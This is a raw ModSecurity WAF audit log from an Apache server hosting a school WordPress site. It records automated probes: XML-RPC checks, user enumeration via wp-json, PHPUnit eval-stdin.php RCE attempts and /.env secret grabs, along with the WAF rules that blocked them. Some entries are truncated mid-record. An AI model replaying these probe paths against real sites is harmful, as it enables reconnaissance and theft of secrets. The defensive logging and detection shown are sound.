Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746377016359344 2181 (- - -) Stopwatch2: 1746377016359344 2181; combined=997, p1=351, p2=607, p3=0, p4=0, p5=39, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe501846-Z-- --bc48b530-A-- [04/May/2025:23:43:42 +0700] aBeZPuchPF6irSergtsHmAAAANI 103.236.140.4 43964 103.236.140.4 8181 --bc48b530-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.76.174 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.76.174 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bc48b530-C-- demo.sayHello --bc48b530-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bc48b530-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746377022214363 4723 (- - -) Stopwatch2: 1746377022214363 4723; combined=3625, p1=449, p2=2974, p3=25, p4=26, p5=89, sr=69, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bc48b530-Z-- --fef3887e-A-- [04/May/2025:23:43:49 +0700] aBeZRdsVQyl9V2B8Pt_EewAAAFA 103.236.140.4 43968 103.236.140.4 8181 --fef3887e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.59.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.59.161 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fef3887e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fef3887e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746377029888867 3421 (- - -) Stopwatch2: 1746377029888867 3421; combined=1584, p1=515, p2=1023, p3=0, p4=0, p5=46, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fef3887e-Z-- --4208182a-A-- [04/May/2025:23:43:54 +0700] aBeZSvnZiHJYHUAF8QfqRQAAAAQ 103.236.140.4 43972 103.236.140.4 8181 --4208182a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.59.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.59.161 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4208182a-C-- demo.sayHello --4208182a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4208182a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746377034898287 5287 (- - -) Stopwatch2: 1746377034898287 5287; combined=3872, p1=447, p2=3216, p3=23, p4=26, p5=94, sr=63, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4208182a-Z-- --a698007c-A-- [04/May/2025:23:44:20 +0700] aBeZZGJEE9ao5dcyYWn61gAAAIY 103.236.140.4 43984 103.236.140.4 8181 --a698007c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.9 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.9 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a698007c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a698007c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746377060889229 2870 (- - -) Stopwatch2: 1746377060889229 2870; combined=1312, p1=441, p2=839, p3=0, p4=0, p5=31, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a698007c-Z-- --d3afd31d-A-- [04/May/2025:23:44:25 +0700] aBeZaWJEE9ao5dcyYWn62AAAAIE 103.236.140.4 43988 103.236.140.4 8181 --d3afd31d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.9 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.9 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d3afd31d-C-- demo.sayHello --d3afd31d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3afd31d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746377065656610 17031 (- - -) Stopwatch2: 1746377065656610 17031; combined=28138, p1=447, p2=3149, p3=23, p4=26, p5=12259, sr=66, sw=62, l=0, gc=12172 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3afd31d-Z-- --201c8554-A-- [04/May/2025:23:46:48 +0700] aBeZ-GJEE9ao5dcyYWn62QAAAIM 103.236.140.4 43992 103.236.140.4 8181 --201c8554-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.100.52 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.100.52 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --201c8554-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --201c8554-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746377208638846 2877 (- - -) Stopwatch2: 1746377208638846 2877; combined=1306, p1=453, p2=822, p3=0, p4=0, p5=31, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --201c8554-Z-- --ec176700-A-- [04/May/2025:23:46:54 +0700] aBeZ_mJEE9ao5dcyYWn63QAAAII 103.236.140.4 44002 103.236.140.4 8181 --ec176700-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.100.52 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.100.52 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ec176700-C-- demo.sayHello --ec176700-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec176700-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746377214032380 4774 (- - -) Stopwatch2: 1746377214032380 4774; combined=3720, p1=451, p2=3070, p3=24, p4=26, p5=88, sr=67, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec176700-Z-- --d6b3b81a-A-- [04/May/2025:23:58:00 +0700] aBecmNsVQyl9V2B8Pt_EkAAAAEY 103.236.140.4 44130 103.236.140.4 8181 --d6b3b81a-B-- POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 89.21.85.27 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 89.21.85.27 X-Forwarded-Proto: http Connection: close Content-Length: 27 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --d6b3b81a-C-- --d6b3b81a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d6b3b81a-E-- --d6b3b81a-H-- Message: Access denied with code 403 (phase 2). String match " --711b6758-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --711b6758-E-- --711b6758-H-- Message: Access denied with code 403 (phase 2). String match " --8298db0f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8298db0f-E-- --8298db0f-H-- Message: Access denied with code 403 (phase 2). String match " --7d806575-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7d806575-H-- Message: Access denied with code 403 (phase 2). String match " --e1f64245-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e1f64245-E-- --e1f64245-H-- Message: Access denied with code 403 (phase 2). String match " --33f70231-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --33f70231-E-- --33f70231-H-- Message: Access denied with code 403 (phase 2). 
String match " --4f2fc500-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4f2fc500-H-- Message: Access denied with code 403 (phase 2). String match " --d7b2510d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7b2510d-E-- --d7b2510d-H-- Message: Access denied with code 403 (phase 2). String match " demo.sayHello --708f9032-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --708f9032-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746379013443398 4932 (- - -) Stopwatch2: 1746379013443398 4932; combined=3806, p1=482, p2=3115, p3=27, p4=30, p5=90, sr=68, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --708f9032-Z-- --7ebd491f-A-- [05/May/2025:00:32:58 +0700] aBekytsVQyl9V2B8Pt_FQQAAAEA 103.236.140.4 45142 103.236.140.4 8181 --7ebd491f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.80.44 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.80.44 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7ebd491f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ebd491f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746379978595179 3287 (- - -) Stopwatch2: 1746379978595179 3287; combined=1376, p1=480, p2=864, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ebd491f-Z-- --88ea4128-A-- [05/May/2025:00:33:03 +0700] aBekz2JEE9ao5dcyYWn6-gAAAI0 103.236.140.4 45146 103.236.140.4 8181 --88ea4128-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.80.44 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.80.44 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --88ea4128-C-- demo.sayHello --88ea4128-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --88ea4128-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746379983742708 6078 (- - -) Stopwatch2: 1746379983742708 6078; combined=4373, p1=581, p2=3548, p3=40, p4=38, p5=98, sr=81, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --88ea4128-Z-- --7741c00c-A-- [05/May/2025:00:33:19 +0700] aBek32JEE9ao5dcyYWn6_AAAAI4 103.236.140.4 45150 103.236.140.4 8181 --7741c00c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.79.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.79.173 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7741c00c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7741c00c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746379999281144 2669 (- - -) Stopwatch2: 1746379999281144 2669; combined=1227, p1=414, p2=783, p3=0, p4=0, p5=29, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7741c00c-Z-- --95c2ad66-A-- [05/May/2025:00:33:25 +0700] aBek5WJEE9ao5dcyYWn6_QAAAJQ 103.236.140.4 45154 103.236.140.4 8181 --95c2ad66-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.79.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.79.173 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --95c2ad66-C-- demo.sayHello --95c2ad66-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --95c2ad66-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746380005549115 5883 (- - -) Stopwatch2: 1746380005549115 5883; combined=4383, p1=558, p2=3592, p3=34, p4=38, p5=96, sr=77, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --95c2ad66-Z-- --4979ba1b-A-- [05/May/2025:00:34:58 +0700] aBelQtsVQyl9V2B8Pt_FRAAAAEE 103.236.140.4 45172 103.236.140.4 8181 --4979ba1b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.177.72 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.177.72 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4979ba1b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4979ba1b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746380098966672 2870 (- - -) Stopwatch2: 1746380098966672 2870; combined=1265, p1=438, p2=795, p3=0, p4=0, p5=31, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4979ba1b-Z-- --61a9a14e-A-- [05/May/2025:00:35:03 +0700] aBelR2JEE9ao5dcyYWn7AwAAAJY 103.236.140.4 45176 103.236.140.4 8181 --61a9a14e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.177.72 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.177.72 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --61a9a14e-C-- demo.sayHello --61a9a14e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --61a9a14e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746380103203049 6639 (- - -) Stopwatch2: 1746380103203049 6639; combined=4660, p1=597, p2=3816, p3=37, p4=42, p5=100, sr=75, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --61a9a14e-Z-- --5141235b-A-- [05/May/2025:00:36:18 +0700] aBelkvnZiHJYHUAF8QfqaQAAABI 103.236.140.4 45208 103.236.140.4 8181 --5141235b-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 206.81.24.227 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 206.81.24.227 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --5141235b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5141235b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746380178439858 696 (- - -) Stopwatch2: 1746380178439858 696; combined=276, p1=252, p2=0, p3=0, p4=0, p5=24, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5141235b-Z-- --74e5b82b-A-- [05/May/2025:00:46:48 +0700] aBeoCOchPF6irSergtsIrgAAANc 103.236.140.4 45344 103.236.140.4 8181 --74e5b82b-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 146.190.103.103 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 146.190.103.103 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --74e5b82b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --74e5b82b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
